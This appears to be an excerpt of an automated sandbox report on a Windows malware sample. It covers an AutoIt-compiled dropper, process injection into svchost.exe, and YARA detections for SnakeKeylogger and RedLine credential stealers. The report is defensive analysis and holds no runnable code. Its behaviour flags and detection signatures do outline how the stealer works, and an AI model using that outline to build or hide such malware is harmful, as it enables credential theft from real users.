Source: chordates.exe.0.dr String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer memstr_2eefaedd-b
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8} Jump to behavior
Contains functionality to communicate with device drivers
Source: C:\Users\user\Desktop\DSD876543456780000.exe Code function: 0_2_00C5D5EB: CreateFileW,DeviceIoControl,CloseHandle, 0_2_00C5D5EB
Contains functionality to launch a process as a different user
Source: C:\Users\user\Desktop\DSD876543456780000.exe Code function: 0_2_00C51201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock, 0_2_00C51201
Contains functionality to shutdown / reboot the system
Source: C:\Users\user\Desktop\DSD876543456780000.exe Code function: 0_2_00C5E8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState, 0_2_00C5E8F6
Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exe Code function: 2_2_00ECE8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState, 2_2_00ECE8F6
Detected potential crypto function
Source: C:\Users\user\Desktop\DSD876543456780000.exe Code function: 0_2_00C62046 0_2_00C62046
Source: C:\Users\user\Desktop\DSD876543456780000.exe Code function: 0_2_00BF8060 0_2_00BF8060
Source: C:\Users\user\Desktop\DSD876543456780000.exe Code function: 0_2_00C58298 0_2_00C58298
Source: C:\Users\user\Desktop\DSD876543456780000.exe Code function: 0_2_00C2E4FF 0_2_00C2E4FF
Source: C:\Users\user\Desktop\DSD876543456780000.exe Code function: 0_2_00C2676B 0_2_00C2676B
Source: C:\Users\user\Desktop\DSD876543456780000.exe Code function: 0_2_00C84873 0_2_00C84873
Source: C:\Users\user\Desktop\DSD876543456780000.exe Code function: 0_2_00BFCAF0 0_2_00BFCAF0
Source: C:\Users\user\Desktop\DSD876543456780000.exe Code function: 0_2_00C1CAA0 0_2_00C1CAA0
Source: C:\Users\user\Desktop\DSD876543456780000.exe Code function: 0_2_00C0CC39 0_2_00C0CC39
Source: C:\Users\user\Desktop\DSD876543456780000.exe Code function: 0_2_00C26DD9 0_2_00C26DD9
Source: C:\Users\user\Desktop\DSD876543456780000.exe Code function: 0_2_00BF91C0 0_2_00BF91C0
Source: C:\Users\user\Desktop\DSD876543456780000.exe Code function: 0_2_00C0B119 0_2_00C0B119
Source: C:\Users\user\Desktop\DSD876543456780000.exe Code function: 0_2_00C11394 0_2_00C11394
Source: C:\Users\user\Desktop\DSD876543456780000.exe Code function: 0_2_00C11706 0_2_00C11706
Source: C:\Users\user\Desktop\DSD876543456780000.exe Code function: 0_2_00C1781B 0_2_00C1781B
Source: C:\Users\user\Desktop\DSD876543456780000.exe Code function: 0_2_00C119B0 0_2_00C119B0
Source: C:\Users\user\Desktop\DSD876543456780000.exe Code function: 0_2_00BF7920 0_2_00BF7920
Source: C:\Users\user\Desktop\DSD876543456780000.exe Code function: 0_2_00C0997D 0_2_00C0997D
Source: C:\Users\user\Desktop\DSD876543456780000.exe Code function: 0_2_00C17A4A 0_2_00C17A4A
Source: C:\Users\user\Desktop\DSD876543456780000.exe Code function: 0_2_00C17CA7 0_2_00C17CA7
Source: C:\Users\user\Desktop\DSD876543456780000.exe Code function: 0_2_00C11C77 0_2_00C11C77
Source: C:\Users\user\Desktop\DSD876543456780000.exe Code function: 0_2_00C29EEE 0_2_00C29EEE
Source: C:\Users\user\Desktop\DSD876543456780000.exe Code function: 0_2_00C7BE44 0_2_00C7BE44
Source: C:\Users\user\Desktop\DSD876543456780000.exe Code function: 0_2_00C11F32 0_2_00C11F32
Source: C:\Users\user\Desktop\DSD876543456780000.exe Code function: 0_2_00B63650 0_2_00B63650
Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exe Code function: 2_2_00E68060 2_2_00E68060
Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exe Code function: 2_2_00ED2046 2_2_00ED2046
Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exe Code function: 2_2_00EC8298 2_2_00EC8298
Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exe Code function: 2_2_00E9E4FF 2_2_00E9E4FF
Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exe Code function: 2_2_00E9676B 2_2_00E9676B
Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exe Code function: 2_2_00EF4873 2_2_00EF4873
Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exe Code function: 2_2_00E6CAF0 2_2_00E6CAF0
Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exe Code function: 2_2_00E8CAA0 2_2_00E8CAA0
Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exe Code function: 2_2_00E7CC39 2_2_00E7CC39
Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exe Code function: 2_2_00E96DD9 2_2_00E96DD9
Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exe Code function: 2_2_00E7D063 2_2_00E7D063
Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exe Code function: 2_2_00E691C0 2_2_00E691C0
Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exe Code function: 2_2_00E7B119 2_2_00E7B119
Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exe Code function: 2_2_00E81394 2_2_00E81394
Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exe Code function: 2_2_00E81706 2_2_00E81706
Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exe Code function: 2_2_00E8781B 2_2_00E8781B
Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exe Code function: 2_2_00E819B0 2_2_00E819B0
Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exe Code function: 2_2_00E7997D 2_2_00E7997D
Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exe Code function: 2_2_00E67920 2_2_00E67920
Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exe Code function: 2_2_00E87A4A 2_2_00E87A4A
Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exe Code function: 2_2_00E87CA7 2_2_00E87CA7
Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exe Code function: 2_2_00E81C77 2_2_00E81C77
Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exe Code function: 2_2_00E99EEE 2_2_00E99EEE
Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exe Code function: 2_2_00EEBE44 2_2_00EEBE44
Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exe Code function: 2_2_00E81F32 2_2_00E81F32
Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exe Code function: 2_2_035C3650 2_2_035C3650
Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_00408C60 3_2_00408C60
Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_0040DC11 3_2_0040DC11
Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_00407C3F 3_2_00407C3F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_00418CCC 3_2_00418CCC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_00406CA0 3_2_00406CA0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_004028B0 3_2_004028B0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_0041A4BE 3_2_0041A4BE
Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_00418244 3_2_00418244
Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_00401650 3_2_00401650
Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_00402F20 3_2_00402F20
Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_004193C4 3_2_004193C4
Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_00418788 3_2_00418788
Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_00402F89 3_2_00402F89
Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_00402B90 3_2_00402B90
Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_004073A0 3_2_004073A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_076BD7B8 3_2_076BD7B8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_076B7630 3_2_076B7630
Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_076BA598 3_2_076BA598
Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_076BC4E0 3_2_076BC4E0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_076BD4E0 3_2_076BD4E0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_076BD20B 3_2_076BD20B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_076BCF30 3_2_076BCF30
Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_076B6E00 3_2_076B6E00
Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_076BEEE0 3_2_076BEEE0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_076B2EF8 3_2_076B2EF8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_076BCC58 3_2_076BCC58
Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_076BC980 3_2_076BC980
Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_076B586F 3_2_076B586F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_076BC6A8 3_2_076BC6A8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_076BD4EB 3_2_076BD4EB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_076B4311 3_2_076B4311
Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_076BEED7 3_2_076BEED7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_076BFBA8 3_2_076BFBA8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_080A5048 3_2_080A5048
Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_080A9C48 3_2_080A9C48
Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_080ACCD0 3_2_080ACCD0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_080A9578 3_2_080A9578
Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_080A0006 3_2_080A0006
Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_080A503B 3_2_080A503B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_080AF834 3_2_080AF834
Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_080A0040 3_2_080A0040
Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_080AF840 3_2_080AF840
Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_080AFC88 3_2_080AFC88
Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_080AFC98 3_2_080AFC98
Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_080ACCC0 3_2_080ACCC0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_080AD119 3_2_080AD119
Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_080AD128 3_2_080AD128
Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_080A2573 3_2_080A2573
Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_080AD570 3_2_080AD570
Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_080A2580 3_2_080A2580
Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_080AD580 3_2_080AD580
Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_080AD9C8 3_2_080AD9C8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_080AD9D8 3_2_080AD9D8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_080ADE1F 3_2_080ADE1F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_080ADE30 3_2_080ADE30
Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_080AE27D 3_2_080AE27D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_080A1E8A 3_2_080A1E8A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_080AE288 3_2_080AE288
Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_080A1E98 3_2_080A1E98
Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_080AE6D0 3_2_080AE6D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_080AE6E0 3_2_080AE6E0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_080AEB29 3_2_080AEB29
Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_080A0B23 3_2_080A0B23
Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_080AEB38 3_2_080AEB38
Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_080A0B30 3_2_080A0B30
Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_080A9358 3_2_080A9358
Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_080AEF80 3_2_080AEF80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_080A179F 3_2_080A179F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_080AEF90 3_2_080AEF90
Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_080A17B0 3_2_080A17B0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_080A8BB1 3_2_080A8BB1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_080A8BC0 3_2_080A8BC0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_080AF3D7 3_2_080AF3D7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_080AF3E8 3_2_080AF3E8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_09062260 3_2_09062260
Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_0906358C 3_2_0906358C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_0906BE18 3_2_0906BE18
Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exe Code function: 5_2_013D3650 5_2_013D3650
Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_00408C60 6_2_00408C60
Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_0040DC11 6_2_0040DC11
Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_00407C3F 6_2_00407C3F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_00418CCC 6_2_00418CCC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_00406CA0 6_2_00406CA0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_004028B0 6_2_004028B0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_0041A4BE 6_2_0041A4BE
Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_00418244 6_2_00418244
Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_00401650 6_2_00401650
Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_00402F20 6_2_00402F20
Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_004193C4 6_2_004193C4
Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_00418788 6_2_00418788
Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_00402F89 6_2_00402F89
Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_00402B90 6_2_00402B90
Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_004073A0 6_2_004073A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_03602260 6_2_03602260
Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_036051E8 6_2_036051E8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_0360BE18 6_2_0360BE18
Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_0360358C 6_2_0360358C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_07ACD7BD 6_2_07ACD7BD
Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_07ACA598 6_2_07ACA598
Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_07ACD4EA 6_2_07ACD4EA
Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_07AC74E0 6_2_07AC74E0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_07ACC4E0 6_2_07ACC4E0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_07ACD216 6_2_07ACD216
Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_07ACCF30 6_2_07ACCF30
Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_07AC6EA8 6_2_07AC6EA8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_07ACEEE0 6_2_07ACEEE0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_07AC2EF8 6_2_07AC2EF8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_07ACCC58 6_2_07ACCC58
Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_07ACC980 6_2_07ACC980
Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_07AC586F 6_2_07AC586F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_07ACC6A8 6_2_07ACC6A8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_07AC4311 6_2_07AC4311
Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_07ACEED2 6_2_07ACEED2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_07ACFBA8 6_2_07ACFBA8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_07ACFB98 6_2_07ACFB98
Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_092A9578 6_2_092A9578
Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_092A2580 6_2_092A2580
Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_092AD9D8 6_2_092AD9D8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_092A5048 6_2_092A5048
Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_092A9C48 6_2_092A9C48
Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_092A0B30 6_2_092A0B30
Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_092A17B0 6_2_092A17B0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_092A1E98 6_2_092A1E98
Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_092AD128 6_2_092AD128
Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_092AD119 6_2_092AD119
Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_092A2572 6_2_092A2572
Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_092AD570 6_2_092AD570
Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_092AD580 6_2_092AD580
Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_092AD9C8 6_2_092AD9C8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_092A5038 6_2_092A5038
Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_092AF832 6_2_092AF832
Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_092A0006 6_2_092A0006
Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_092A0040 6_2_092A0040
Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_092AF840 6_2_092AF840
Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_092AFC88 6_2_092AFC88
Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_092AFC98 6_2_092AFC98
Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_092ACCC0 6_2_092ACCC0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_092ACCD0 6_2_092ACCD0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_092AEB29 6_2_092AEB29
Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_092A0B20 6_2_092A0B20
Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_092AEB38 6_2_092AEB38
Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_092A9358 6_2_092A9358
Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_092A8BB1 6_2_092A8BB1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_092AEF80 6_2_092AEF80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_092A179F 6_2_092A179F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_092AEF90 6_2_092AEF90
Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_092AF3E8 6_2_092AF3E8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_092A8BC0 6_2_092A8BC0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_092AF3D7 6_2_092AF3D7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_092ADE30 6_2_092ADE30
Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_092ADE1F 6_2_092ADE1F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_092AE27A 6_2_092AE27A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_092A1E8A 6_2_092A1E8A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_092AE288 6_2_092AE288
Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_092AE6E0 6_2_092AE6E0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_092AE6D0 6_2_092AE6D0
Found potential string decryption / allocating functions
Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 0040D606 appears 48 times
Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 0040E1D8 appears 88 times
Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exe Code function: String function: 00E7F9F2 appears 40 times
Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exe Code function: String function: 00E69CB3 appears 31 times
Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exe Code function: String function: 00E80A30 appears 46 times
Source: C:\Users\user\Desktop\DSD876543456780000.exe Code function: String function: 00C0F9F2 appears 40 times
Source: C:\Users\user\Desktop\DSD876543456780000.exe Code function: String function: 00BF9CB3 appears 31 times
Source: C:\Users\user\Desktop\DSD876543456780000.exe Code function: String function: 00C10A30 appears 46 times
Uses 32bit PE files
Source: DSD876543456780000.exe Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Yara signature match
Source: 3.3.svchost.exe.305af20.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 3.3.svchost.exe.305af20.1.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 3.3.svchost.exe.305af20.1.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 6.3.svchost.exe.346f000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 6.3.svchost.exe.346f000.0.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 6.3.svchost.exe.346f000.0.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 2.2.chordates.exe.3a90000.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 3.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 3.2.svchost.exe.3174f2e.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 3.2.svchost.exe.3174f2e.1.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 3.2.svchost.exe.3174f2e.1.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 3.2.svchost.exe.7730000.2.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
